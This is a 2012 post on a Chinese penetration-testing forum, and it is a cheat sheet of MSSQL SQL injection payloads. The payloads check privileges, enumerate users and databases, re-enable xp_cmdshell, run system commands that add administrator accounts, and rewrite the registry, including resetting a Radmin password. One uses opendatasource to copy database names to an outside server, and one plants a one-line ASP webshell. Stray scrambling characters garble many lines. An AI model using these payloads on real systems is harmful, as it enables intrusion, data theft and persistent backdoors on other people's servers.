找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 常用的一些注入命令
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1979|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的" u( o* h4 \. v& y- c
and 1=(Select IS_MEMBER('db_owner'))2 s; T8 _2 M' \9 i! G1 N& a# n
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--7 Y0 e, e- T" D" q
7 U+ ?8 F8 u; U* S) R# ]* F
//检测是否有读取某数据库的权限
3 u! Q. P, b, O2 p$ Y; u) Zand 1= (Select HAS_DBACCESS('master'))
3 Y, ^% G5 U5 E* lAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --0 H/ d4 W* M* h: O5 v# y
+ L8 B0 O) c: T& U3 D3 n. E
% |3 o1 [8 w2 j
数字类型5 T2 _9 [, W! g
and char(124)%2Buser%2Bchar(124)=0
- j6 n! I! \9 u0 _) S
" p6 \/ V+ |, J; c3 G字符类型5 n/ `4 C0 e. w. [, y
' and char(124)%2Buser%2Bchar(124)=0 and ''='
. y) J- ~, w3 d  Z5 e8 j- d  K; F) h# q# z: b/ e3 a/ ~$ H
搜索类型
* t% D' N" n6 {' and char(124)%2Buser%2Bchar(124)=0 and '%'='- @* z; O+ Q% P' n! G) R

4 c( a" p1 v. I9 n7 l) R, |$ e0 ~爆用户名
1 V* l: ?) d+ A: O5 zand user>0
* K$ G3 H/ V2 p+ u6 N' w# a: {' and user>0 and ''='
! n) W: W$ p$ t0 D) `( L$ _
4 `' I. \+ j, B, M8 V- s3 j检测是否为SA权限
: E' d! ~) g7 Y6 h2 I  g/ r0 Vand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
" N- U. _: V" uAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --& h6 i. L  a" S
; Y& }! G; C4 V4 u) H% ^( k
检测是不是MSSQL数据库6 w8 m! D, f7 D* O6 A9 i; g1 U
and exists (select * from sysobjects);--
9 d; W$ T* L3 T! ^8 k- N# P& L1 R2 K, O
检测是否支持多行
, K% W, b+ {& \6 M( w$ S' z( B3 `;declare @d int;--
4 ]4 m' e0 k* u* X
( N) x5 Z* s3 e% S恢复 xp_cmdshell
0 U) N# D% p- W/ p- g7 {( r' ];exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
. V* d% F# d- J( G7 G1 o5 E4 \
$ J! h$ O9 H# D# R5 [! Q+ ]
( o+ {5 y/ R9 e+ V. s9 u, T; i7 G- }select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
7 C* R4 v) T- S" U/ h
. g! M0 J) @+ I) K; ~/ }9 X//-----------------------
0 y1 p5 ]7 Z' N( g: ?' |//       执行命令- [: N0 p0 P" S
//-----------------------
: ^( R3 T8 }: y1 \, X; |首先开启沙盘模式:$ \* U, Q$ K( T* B7 e
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
1 S) c' u- S* |4 A6 g' M* p; M8 {; @, d7 T- ]
然后利用jet.oledb执行系统命令
% v$ R7 S6 {, E# f5 vselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')4 g: V( B: G9 S8 B6 P# z+ X9 M
8 w8 E9 p: }% }5 k7 X; d4 k
执行命令4 s# i' l; c/ z* l' T' y
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--+ L& l  f% c; j" M0 U) w
0 P% o8 _* R. Z) P& N" B
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
. X  m) }+ o1 v2 @
2 F- T5 ?1 A( k% Z) l: H判断xp_cmdshell扩展存储过程是否存在:& d" J) r4 N8 L; Q" i4 w8 _+ k
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')5 `+ O% G/ k- E  }9 x

; e' p* X8 ~0 V2 a5 i写注册表+ v# K2 }' Q- q% Y, d" o4 Z) C
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1! ?9 K7 L; Q+ c& T4 r$ M
2 ~" F3 v6 Q, A9 w3 }' c; I
REG_SZ
. D& S8 V" X8 ]- _' @3 \4 ~' P9 F) A" u& |0 y# M
读注册表, @6 |: k$ r% x8 L
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'9 h3 M! V, U1 \

" j$ `- J0 o% ]* ]" l读取目录内容
) ]7 z# C& ^3 V$ v9 v) `0 gexec master..xp_dirtree 'c:\winnt\system32\',1,1
1 O- r7 u- A5 J" \1 A  I5 F! T+ J5 y/ z+ d2 o, Q
; p. ?# b4 X9 J3 e; Z
数据库备份
" s- N3 P' |% Q, D/ c1 r! Abackup database pubs to disk = 'c:\123.bak'" ]/ ^2 Q; T# d" T6 [5 U
3 ]# z) u! L9 j8 M6 Z  _
//爆出长度# u5 {3 B+ m/ K3 ]# J% X! v" r
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
6 T% N5 j8 a) b% N+ q
* Z# M. _2 ?* J% f8 a
. ~. f, E  K1 x& K8 n
# o, s, n5 ]9 q4 ?9 u更改sa口令方法:用sql综合利用工具连接后,执行命令:
; j0 E+ r+ `9 q) Wexec sp_password NULL,'新密码','sa'
+ A% B, t' _( G) Y5 `# u: l4 ^
添加和删除一个SA权限的用户test:1 q2 l7 j5 @" D
exec master.dbo.sp_addlogin test,9530772
2 o5 q, x9 B+ B/ g9 I! A3 Nexec master.dbo.sp_addsrvrolemember test,sysadmin/ |3 K4 v' k& x1 u3 f) |$ u' T. H

: x6 U' l% @, G6 @# p删除扩展存储过过程xp_cmdshell的语句:" O7 N5 J- C  M- `$ x1 I2 K: h
exec sp_dropextendedproc 'xp_cmdshell'; v: m1 u! Q8 Z; ]4 C5 f

/ H5 i3 i5 t) R) i添加扩展存储过过程
# J9 q& O3 W& c! @EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'. Z0 F. r5 f2 z% d1 c
GRANT exec On xp_proxiedadata TO public
$ J  f5 b; m: `: ]
2 @! S) z2 ~3 R' v8 c# K
% _- G) t) V  q1 m停掉或激活某个服务。. _4 T' ^* O* P
' r! ^. D. b9 ~+ N- G
exec master..xp_servicecontrol 'stop','schedule', u" D5 l3 L1 d: N* L
exec master..xp_servicecontrol 'start','schedule'3 M6 l* c) I2 u! t

5 F; q# G# \; h8 g$ [dbo.xp_subdirs
2 V% a' |7 y* f" r7 ~# v. r" R7 S. A7 ?/ y  R
只列某个目录下的子目录。' N+ ]" |7 w# @2 h$ E
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'7 o' I: [- e3 V4 L7 u' \- @1 g

0 q! E7 u9 Y2 e9 k3 gdbo.xp_makecab
- ?( n* E% e0 Y$ J: t# i$ F: T' x( q
将目标多个档案压缩到某个目标档案之内。9 z% C; c' x5 ]+ p. Z4 Z
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
7 a$ m8 c5 ?+ ~4 d8 s! D/ O( ]) X9 m  J) K* @; _' w/ k! p4 X
dbo.xp_makecab' }/ l; \* n3 M; O8 ]  [" P& O% n: A
'c:\test.cab','mszip',1,* K# u4 _$ B5 j: \2 W& D" |- {3 v
'C:\Inetpub\wwwroot\SQLInject\login.asp',; |. \3 _( R) v
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'% N7 Y  S+ Y* H" Z- {: U
/ J( i& d; B7 J$ o7 n4 [/ B& K
xp_terminate_process
9 M1 `3 O1 v# [. |1 j) N/ \6 }/ g9 {
停掉某个执行中的程序,但赋予的参数是 Process ID。
6 y2 _6 F% h" U2 \利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
& a' }2 q) Y& R# K$ h' B- Z2 m; Y0 d7 l
xp_terminate_process 24843 W: F( K9 V( i
5 L& Q) z! ~8 u. |$ B/ L3 K
xp_unpackcab
1 X, V3 B8 V. o, f6 N: J3 H; h
解开压缩档。3 s0 o+ q' a* ^: t  ^; M
) ^2 j* }! R$ g
xp_unpackcab 'c:\test.cab','c:\temp',1
2 |' T1 X. J+ G
' P4 k6 s3 {* i) x; w) }" c. _' X) K# X7 e5 J; \4 d, ]
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
4 f% N9 b0 P; I# q. x& S
$ S- T+ ^3 h) Y$ R) g2 ?create database lcx;
0 M% a/ _. o8 q" m# k5 lCreate TABLE ku(name nvarchar(256) null);
9 M# |' ^9 ?9 A  |( N4 c' \; l& UCreate TABLE biao(id int NULL,name nvarchar(256) null);" a2 B/ r2 g) e5 {: t1 L- `- F  P
5 x# t7 G! ]# y9 J
//得到数据库名
! ~. h! N9 {7 E( R2 X7 d- Dinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
. }2 {( _" S& d4 g% W5 _! u! K# L4 Z- l. _6 J% k* A
/ K! B4 e: q) E3 h' A- X4 l9 w
//在Master中创建表,看看权限怎样9 u$ c0 y, }9 I7 n, V2 G- I
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--  R: t+ }* ], C/ X* K. p5 I* X

' T; @6 s6 U  L% a用 sp_makewebtask直接在web目录里写入一句话马:0 S+ F1 A' Z6 S( G& l; w4 F4 k
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--, g& i& d9 D1 Z

. }2 J) F, @  z" h" T, X//更新表内容# W0 W* o/ r5 X% A4 W# g
Update films SET kind = 'Dramatic' Where id = 123; U; f, j; F1 Y

! D9 M# h9 d& p7 g//删除内容
3 I5 o: p0 z6 y( `$ A% a1 O9 ?delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表